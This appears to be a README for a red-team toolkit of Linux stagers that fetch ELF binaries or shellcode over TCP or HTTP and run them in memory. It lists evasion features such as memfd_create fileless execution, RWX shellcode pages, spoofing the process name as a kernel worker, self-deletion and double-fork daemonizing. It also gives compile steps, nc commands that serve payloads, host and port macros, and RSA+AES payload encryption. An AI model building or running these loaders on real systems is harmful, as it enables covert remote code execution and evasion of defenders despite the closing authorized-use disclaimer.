A collection of Linux stagers featuring basic ELF stagers, shellcode stagers, and encrypted shellcode stagers with RSA-2048 + AES-256-GCM hybrid encryption.
English | 中文
.
├── stagers/
│ ├── basic/ # Basic ELF download-and-execute stagers
│ ├── shellcode/ # Shellcode download-and-execute stagers
│ └── encrypted/ # Encrypted shellcode stagers with RSA+AES
├── tools/ # Encryption and key generation tools
├── scripts/ # Build and test automation scripts
├── elf_to_shellcode/ # ELF to shellcode conversion utility
└── README.md
- Download and execute ELF binaries via TCP or HTTP
- Fileless execution using
memfd_create() - Process name spoofing and self-deletion
- Download and execute raw shellcode via TCP or HTTP
- Direct memory execution with RWX pages
- Daemonization and process hiding
- RSA-2048 + AES-256-GCM hybrid encryption
- Embedded private key for decryption
- All features from shellcode stagers
cd stagers/basic
# Edit configuration in source file
#define HOST "127.0.0.1"
#define PORT 8080
# Compile
gcc -o stager_tcp linux_stager_tcp.c -O2 -s
gcc -o stager_http linux_stager_http.c -O2 -s
# Run server
nc -l -p 8080 < payload.elf
# Execute stager
./stager_tcpcd stagers/shellcode
# Compile
gcc -o stager_tcp linux_stager_shellcode_tcp.c
gcc -o stager_http linux_stager_shellcode_http.c
# Run server
nc -l -p 8080 < shellcode.bin
# Execute stager
./stager_tcp# Build tools
./scripts/build_encrypted_stagers.sh
# Generate keys
cd tools
./generate_keypair
# Embed private key
python3 embed_key.py ../stagers/encrypted/linux_stager_shellcode_tcp_encrypted.c stager_private.pem
# Compile stager
cd ../stagers/encrypted
gcc -o stager_tcp_encrypted linux_stager_shellcode_tcp_encrypted.c -lssl -lcrypto
# Encrypt shellcode
cd ../../tools
./encrypt_shellcode shellcode.bin stager_public.pem shellcode.enc
# Run server
nc -l -p 8080 < shellcode.enc
# Execute stager
cd ../stagers/encrypted
./stager_tcp_encryptedAll stagers use compile-time configuration via #define macros:
// TCP stagers
#define HOST "127.0.0.1"
#define PORT 8080
// HTTP stagers
#define HTTP_HOST "10.0.0.106"
#define HTTP_PORT 8080
#define HTTP_PATH "/payload"
// Process name spoofing
#define SPOOFED_PROC_NAME "[kworker/1:5-events]"- generate_keypair: Generate RSA-2048 key pairs
- encrypt_shellcode: Encrypt shellcode with RSA+AES
- embed_key.py: Embed private key into C source files
- elf_to_shellcode: Convert ELF binaries to shellcode
[256 bytes] RSA-2048 encrypted AES key
[ 16 bytes] AES-GCM IV
[ 16 bytes] AES-GCM authentication tag
[variable ] AES-256-GCM encrypted shellcode
- Process name spoofing as kernel threads
- Binary self-deletion
- Pure memory execution (no disk writes)
- Double fork daemonization
- GCC compiler
- Linux kernel 3.17+ (for memfd_create)
- OpenSSL development libraries (for encrypted stagers)
- Python 3 (for embed_key.py)
# Ubuntu/Debian
sudo apt-get install build-essential libssl-dev python3
# CentOS/RHEL
sudo yum groupinstall "Development Tools"
sudo yum install openssl-devel python3Legal Use Only: This toolset is for authorized penetration testing and security research in controlled environments.
Detection Risks:
- OpenSSL library dependencies may be flagged
- Network traffic patterns can be detected
- Memory scanning can detect RWX pages
- Process name spoofing may be detected
This project is for educational purposes only. Use responsibly and only in authorized environments.
The authors and contributors are not responsible for misuse of this software. Users are solely responsible for ensuring they have proper authorization before using these tools.